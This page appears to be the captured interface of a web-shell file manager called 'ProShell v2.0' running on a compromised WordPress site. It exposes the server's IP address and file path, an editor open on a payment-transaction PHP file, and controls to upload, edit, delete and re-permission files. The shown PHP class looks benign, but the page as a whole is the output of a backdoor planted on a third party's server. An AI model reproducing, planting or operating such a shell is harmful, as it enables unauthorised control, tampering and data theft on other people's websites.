ProShell v2.0
Dashboard
Server Info
Server: 158.106.128.192
PHP: 8.2.33
home
planet5
public_html
bansibaba.com
wp-includes
2026-09-17 06:01:31
Editing: Manual.php
Cancel
Save Changes
<?php /** * Class represents a transaction made by admin or export process */ class Am_Paysystem_Transaction_Manual extends Am_Paysystem_Transaction_Abstract { protected $dattm; protected $amount; protected $receiptId; public function __construct(Am_Paysystem_Abstract $plugin) { $this->plugin = $plugin; } function setAmount($amount) { $this->amount = moneyRound($amount); return $this; } function getAmount() { return $this->amount; } function getReceiptId() { return $this->receiptId; } function setReceiptId($receiptId) { $this->receiptId = (string)$receiptId; return $this; } public function getUniqId() { return $this->getReceiptId().'-manual-'.time().rand(1000,9999); } }
Upload Files
Cancel
Upload
Create New
Cancel
Create
Change Permissions
Cancel
Save
Change Date
Cancel
Save
Rename Item
Cancel
Save
Confirm Delete
Are you sure you want to delete the selected items?
Cancel
Delete